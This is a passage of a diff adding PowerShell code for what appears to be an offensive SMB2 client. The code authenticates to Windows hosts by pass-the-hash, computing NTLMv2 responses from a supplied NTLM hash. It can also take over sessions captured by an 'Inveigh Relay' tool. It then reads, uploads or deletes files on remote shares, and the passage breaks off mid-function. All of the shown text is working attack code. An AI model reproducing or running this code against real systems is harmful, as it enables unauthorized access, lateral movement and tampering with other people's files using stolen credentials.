+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'exit'
+ }
+
+ }
+
+ }
+
+ if($SMB_version -eq 'SMB2')
+ {
+ $SMB_NTLMSSP = [System.BitConverter]::ToString($SMB_client_receive)
+ $SMB_NTLMSSP = $SMB_NTLMSSP -replace "-",""
+ $SMB_NTLMSSP_index = $SMB_NTLMSSP.IndexOf("4E544C4D53535000")
+ $SMB_NTLMSSP_bytes_index = $SMB_NTLMSSP_index / 2
+ $SMB_domain_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 12) $SMB_client_receive
+ $SMB_target_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 40) $SMB_client_receive
+ $SMB_session_ID = $SMB_client_receive[44..51]
+ $SMB_NTLM_challenge = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 24)..($SMB_NTLMSSP_bytes_index + 31)]
+ $SMB_target_details = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ $SMB_target_time_bytes = $SMB_target_details[($SMB_target_details.Length - 12)..($SMB_target_details.Length - 5)]
+ $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-"
+ $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $auth_hostname = (Get-ChildItem -path env:computername).Value
+ $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname)
+ $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($Domain)
+ $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username)
+ $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)
+ $auth_domain_length = $auth_domain_length[0,1]
+ $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)
+ $auth_domain_length = $auth_domain_length[0,1]
+ $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length)
+ $auth_username_length = $auth_username_length[0,1]
+ $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length)
+ $auth_hostname_length = $auth_hostname_length[0,1]
+ $auth_domain_offset = 0x40,0x00,0x00,0x00
+ $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64)
+ $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64)
+ $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64)
+ $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88)
+ $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5
+ $HMAC_MD5.key = $NTLM_hash_bytes
+ $username_and_target = $username.ToUpper()
+ $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target)
+ $username_and_target_bytes += $auth_domain_bytes
+ $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
+ $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ $security_blob_bytes = 0x01,0x01,0x00,0x00,
+ 0x00,0x00,0x00,0x00 +
+ $SMB_target_time_bytes +
+ $client_challenge_bytes +
+ 0x00,0x00,0x00,0x00 +
+ $SMB_target_details +
+ 0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00
+
+ $server_challenge_and_security_blob_bytes = $SMB_NTLM_challenge + $security_blob_bytes
+ $HMAC_MD5.key = $NTLMv2_hash
+ $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes)
+
+ if($SMB_signing)
+ {
+ $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response)
+ $session_key = $session_base_key
+ $HMAC_SHA256 = New-Object System.Security.Cryptography.HMACSHA256
+ $HMAC_SHA256.key = $session_key
+ }
+
+ $NTLMv2_response = $NTLMv2_response + $security_blob_bytes
+ $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length)
+ $NTLMv2_response_length = $NTLMv2_response_length[0,1]
+ $SMB_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88)
+
+ $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,
+ 0x03,0x00,0x00,0x00,
+ 0x18,0x00,
+ 0x18,0x00 +
+ $auth_LM_offset +
+ $NTLMv2_response_length +
+ $NTLMv2_response_length +
+ $auth_NTLM_offset +
+ $auth_domain_length +
+ $auth_domain_length +
+ $auth_domain_offset +
+ $auth_username_length +
+ $auth_username_length +
+ $auth_username_offset +
+ $auth_hostname_length +
+ $auth_hostname_length +
+ $auth_hostname_offset +
+ $SMB_session_key_length +
+ $SMB_session_key_length +
+ $SMB_session_key_offset +
+ $SMB_negotiate_flags +
+ $auth_domain_bytes +
+ $auth_username_bytes +
+ $auth_hostname_bytes +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $NTLMv2_response
+
+ $SMB2_message_ID ++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_auth
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00')
+ {
+ Write-Verbose "[+] $output_username successfully authenticated on $target"
+ $login_successful = $true
+ }
+ else
+ {
+ $output_message = "[-] $output_username failed to authenticate on $target"
+ $login_successful = $false
+ }
+
+ }
+
+ }
+
+ try
+ {
+
+ if($login_successful -or $session_string)
+ {
+
+ if($session_string)
+ {
+
+ if($session_string -and $inveigh.session_lock_table[$session] -eq 'locked')
+ {
+ Write-Output "[*] Pausing due to Inveigh Relay session lock"
+ Start-Sleep -s 2
+ }
+
+ $inveigh.session_lock_table[$session] = 'locked'
+ $SMB_client = $inveigh.session_socket_table[$session]
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_session_ID = $inveigh.session_table[$session]
+ $SMB2_message_ID = $inveigh.session_message_ID_table[$session]
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ }
+
+ $SMB_path = "\\" + $Target + "\IPC$"
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ $directory_list = New-Object System.Collections.ArrayList
+ $SMB_client_stage = 'TreeConnect'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
+ {
+
+ switch($SMB_client_stage)
+ {
+
+ 'TreeConnect'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+ catch
+ {
+ Write-Output "[-] Session connection is closed"
+ $SMB_client_stage = 'Exit'
+ }
+
+ if($SMB_client_stage -ne 'Exit')
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '00-00-00-00')
+ {
+ $error_code = [System.BitConverter]::ToString($SMB_client_receive[12..15])
+
+ switch($error_code)
+ {
+
+ 'cc-00-00-c0'
+ {
+ $output_message = "[-] Share not found"
+ $SMB_client_stage = 'Exit'
+ }
+
+ '22-00-00-c0'
+ {
+ $output_message = "[-] Access denied"
+ $SMB_client_stage = 'Exit'
+ }
+
+ default
+ {
+ $error_code = $error_code -replace "-",""
+ $output_message = "[-] Tree connect error code 0x$error_code"
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ }
+ elseif($refresh)
+ {
+ Write-Output "[+] Session refreshed"
+ $SMB_client_stage = 'Exit'
+ }
+ elseif(!$SMB_IPC)
+ {
+ $SMB_share_path = "\\" + $Target + "\" + $Share
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_share_path)
+ $SMB_IPC = $true
+ $SMB_client_stage = 'IoctlRequest'
+ }
+ else
+ {
+
+ if($Action -eq 'Put')
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ $create_request_extra_info = 2
+ }
+ else
+ {
+ $create_request_extra_info = 1
+ }
+
+ $SMB2_tree_ID = $SMB_client_receive[40..43]
+ $SMB_client_stage = 'CreateRequest'
+
+ if($Action -eq 'Get')
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ }
+
+ }
+
+ }
+
+ }
+
+ 'IoctlRequest'
+ {
+ $SMB2_tree_ID = 0x01,0x00,0x00,0x00
+ $SMB_ioctl_path = "\" + $Target + "\" + $Share
+ $SMB_ioctl_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_ioctl_path) + 0x00,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2IoctlRequest $SMB_ioctl_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_client_stage = 'TreeConnect'
+ }
+
+ 'CreateRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CreateRequest $SMB2_file $create_request_extra_info $source_file_size
+
+ if($directory_list.Count -gt 0)
+ {
+ $packet_SMB2_data["DesiredAccess"] = 0x81,0x00,0x10,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00
+ }
+
+ if($Action -eq 'Delete')
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x00,0x00,0x20,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x80,0x00,0x00,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00
+ }
+
+ 2
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x40,0x00,0x20,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x80,0x00,0x01,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00
+ }
+
+ }
+
+ }
+
+ if($Action -eq 'Get')
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x00,0x00,0x20,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x89,0x00,0x12,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x05,0x00,0x00,0x00
+ }
+
+ if($Action -eq 'Put')
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x60,0x00,0x20,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x89,0x00,0x12,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x01,0x00,0x00,0x00
+ $packet_SMB2_data["RequestedOplockLevel"] = 0xff
+ }
+
+ 1
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x64,0x00,0x00,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x97,0x01,0x13,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x00,0x00,0x00,0x00
+ $packet_SMB2_data["RequestedOplockLevel"] = 0xff
+ $packet_SMB2_data["FileAttributes"] = 0x20,0x00,0x00,0x00
+ $packet_SMB2_data["CreateDisposition"] = 0x05,0x00,0x00,0x00
+ }
+
+ }
+
+ }
+
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '00-00-00-00')
+ {
+
+ $error_code = [System.BitConverter]::ToString($SMB_client_receive[12..15])
+
+ switch($error_code)
+ {
+
+ '03-01-00-c0'
+ {
+ $SMB_client_stage = 'Exit'
+ }
+
+ '22-00-00-c0'
+ {
+
+ if($directory_list.Count -gt 0)
+ {
+ $directory_list.RemoveAt(0) > $null
+ }
+ else
+ {
+ $output_message = "[-] Access denied"
+ $share_subdirectory_start = $false
+ }
+
+ $SMB_client_stage = 'CloseRequest'
+
+ }
+
+ '34-00-00-c0'
+ {
+
+ if($Action -eq 'Put')
+ {
+ $create_request_extra_info = 3
+ $action_step++
+ $SMB_client_stage = 'CreateRequest'
+ }
+ else
+ {
+ $output_message = "[-] File not found"
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ 'ba-00-00-c0'
+ {
+
+ if($Action -eq 'Put')
+ {
+ $output_message = "[-] Destination filname must be specified"
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+
+ default
+ {
+ $error_code = $error_code -replace "-",""
+ $output_message = "[-] Create request error code 0x$error_code"
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ }
+ elseif($Action -eq 'Delete' -and $action_step -eq 2)
+ {
+ $set_info_request_file_info_class = 0x01
+ $set_info_request_info_level = 0x0d
+ $set_info_request_buffer = 0x01,0x00,0x00,0x00
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB_client_stage = 'SetInfoRequest'
+ }
+ elseif($Action -eq 'Get' -and $action_step -ne 1)
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $action_step++
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ 2
+ {
+
+ if($file_size -lt 4096)
+ {
+ $read_request_length = $file_size
+ }
+ else
+ {
+ $read_request_length = 4096
+ }
+
+ $read_request_offset = 0
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $action_step++
+ $SMB_client_stage = 'ReadRequest'
+ }
+
+ 4
+ {
+ $header_next_command = 0x68,0x00,0x00,0x00
+ $query_info_request_info_type_1 = 0x01
+ $query_info_request_file_info_class_1 = 0x07
+ $query_info_request_output_buffer_length_1 = 0x00,0x10,0x00,0x00
+ $query_info_request_input_buffer_offset_1 = 0x68,0x00
+ $query_info_request_buffer_1 = 0
+ $query_info_request_info_type_2 = 0x01
+ $query_info_request_file_info_class_2 = 0x16
+ $query_info_request_output_buffer_length_2 = 0x00,0x10,0x00,0x00
+ $query_info_request_input_buffer_offset_2 = 0x68,0x00
+ $query_info_request_buffer_2 = 0
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $action_step++
+ $SMB_client_stage = 'QueryInfoRequest'
+ }
+
+ }
+
+ }
+ elseif($Action -eq 'Put')
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+
+ if($Action -eq 'Put')
+ {
+ $output_message = "Destination file exists"
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+
+ 1
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $action_step++
+ $header_next_command = 0x70,0x00,0x00,0x00
+ $query_info_request_info_type_1 = 0x02
+ $query_info_request_file_info_class_1 = 0x01
+ $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_1 = 0x00,0x00
+ $query_info_request_buffer_1 = 8
+ $query_info_request_info_type_2 = 0x02
+ $query_info_request_file_info_class_2 = 0x05
+ $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_2 = 0x00,0x00
+ $query_info_request_buffer_2 = 1
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB_client_stage = 'QueryInfoRequest'
+ }
+
+ }
+
+ }
+ elseif($share_subdirectory_start)
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB_client_stage = 'CloseRequest'
+ }
+ elseif($directory_list.Count -gt 0 -or $action_step -eq 1)
+ {
+ $SMB_client_stage = 'FindRequest'
+ }
+ else
+ {
+ $header_next_command = 0x70,0x00,0x00,0x00
+ $query_info_request_info_type_1 = 0x02
+ $query_info_request_file_info_class_1 = 0x01
+ $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_1 = 0x00,0x00
+ $query_info_request_buffer_1 = 8
+ $query_info_request_info_type_2 = 0x02
+ $query_info_request_file_info_class_2 = 0x05
+ $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_2 = 0x00,0x00
+ $query_info_request_buffer_2 = 1
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB_client_stage = 'QueryInfoRequest'
+
+ if($share_subdirectory)
+ {
+ $share_subdirectory_start = $true
+ }
+
+ }
+
+ }
+
+ 'QueryInfoRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header["NextCommand"] = $header_next_command
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2QueryInfoRequest $query_info_request_info_type_1 $query_info_request_file_info_class_1 $query_info_request_output_buffer_length_1 $query_info_request_input_buffer_offset_1 $SMB_file_ID $query_info_request_buffer_1
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00
+ }
+ else
+ {
+ $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00
+ }
+
+ $packet_SMB2b_data = New-PacketSMB2QueryInfoRequest $query_info_request_info_type_2 $query_info_request_file_info_class_2 $query_info_request_output_buffer_length_2 $query_info_request_input_buffer_offset_2 $SMB_file_ID $query_info_request_buffer_2
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length) ($SMB2_data.Length + $SMB2b_data.Length)
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2b_header + $SMB2b_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2b_header["Signature"] = $SMB2_signature
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($share_subdirectory_start)
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ $root_directory = $SMB2_file + 0x5c,0x00
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+ }
+ elseif($Action -eq 'Get')
+ {
+
+ switch($action_step)
+ {
+
+ 5
+ {
+ $query_info_response = [System.BitConverter]::ToString($SMB_client_receive)
+ $query_info_response = $query_info_response -replace "-",""
+ $file_stream_size_index = $query_info_response.Substring(10).IndexOf("FE534D42") + 170
+ $file_stream_size = [System.BitConverter]::ToUInt32($SMB_client_receive[($file_stream_size_index / 2)..($file_stream_size_index / 2 + 8)],0)
+ $file_stream_size_quotient = [Math]::Truncate($file_stream_size / 65536)
+ $file_stream_size_remainder = $file_stream_size % 65536
+ $percent_complete = $file_stream_size_quotient
+
+ if($file_stream_size_remainder -ne 0)
+ {
+ $percent_complete++
+ }
+
+ if($file_stream_size -lt 1024)
+ {
+ $progress_file_size = "" + $file_stream_size + "B"
+ }
+ elseif($file_stream_size -lt 1024000)
+ {
+ $progress_file_size = "" + ($file_stream_size / 1024).ToString('.00') + "KB"
+ }
+ else
+ {
+ $progress_file_size = "" + ($file_stream_size / 1024000).ToString('.00') + "MB"
+ }
+
+ $header_next_command = 0x70,0x00,0x00,0x00
+ $query_info_request_info_type_1 = 0x02
+ $query_info_request_file_info_class_1 = 0x01
+ $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_1 = 0x00,0x00
+ $query_info_request_buffer_1 = 8
+ $query_info_request_info_type_2 = 0x02
+ $query_info_request_file_info_class_2 = 0x05
+ $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_2 = 0x00,0x00
+ $query_info_request_buffer_2 = 1
+ $action_step++
+ $SMB_client_stage = 'QueryInfoRequest'
+ }
+
+ 6
+ {
+
+ if($file_stream_size -lt 65536)
+ {
+ $read_request_length = $file_stream_size
+ }
+ else
+ {
+ $read_request_length = 65536
+ }
+
+ $read_request_offset = 0
+ $read_request_step = 1
+ $action_step++
+ $SMB_client_stage = 'ReadRequest'
+ }
+
+ }
+ }
+ elseif($Action -eq 'Put')
+ {
+ $percent_complete = $source_file_size_quotient
+
+ if($source_file_size_remainder -ne 0)
+ {
+ $percent_complete++
+ }
+
+ if($source_file_size -lt 1024)
+ {
+ $progress_file_size = "" + $source_file_size + "B"
+ }
+ elseif($source_file_size -lt 1024000)
+ {
+ $progress_file_size = "" + ($source_file_size / 1024).ToString('.00') + "KB"
+ }
+ else
+ {
+ $progress_file_size = "" + ($source_file_size / 1024000).ToString('.00') + "MB"
+ }
+
+ $action_step++
+ $set_info_request_file_info_class = 0x01
+ $set_info_request_info_level = 0x14
+ $set_info_request_buffer = [System.BitConverter]::GetBytes($source_file_size)
+ $SMB_client_stage = 'SetInfoRequest'
+ }
+ elseif($Action -eq 'Delete')
+ {
+ $SMB_client_stage = 'CreateRequest'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateRequestFindRequest'
+ }
+
+ }
+
+ 'SetInfoRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2SetInfoRequest $set_info_request_file_info_class $set_info_request_info_level $SMB_file_ID $set_info_request_buffer
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($source_file_size -le 65536)
+ {
+ $write_request_length = $source_file_size
+ }
+ else
+ {
+ $write_request_length = 65536
+ }
+
+ $write_request_offset = 0
+ $write_request_step = 1
+
+ if($Action -eq 'Delete')
+ {
+ $output_message = "[+] File deleted"
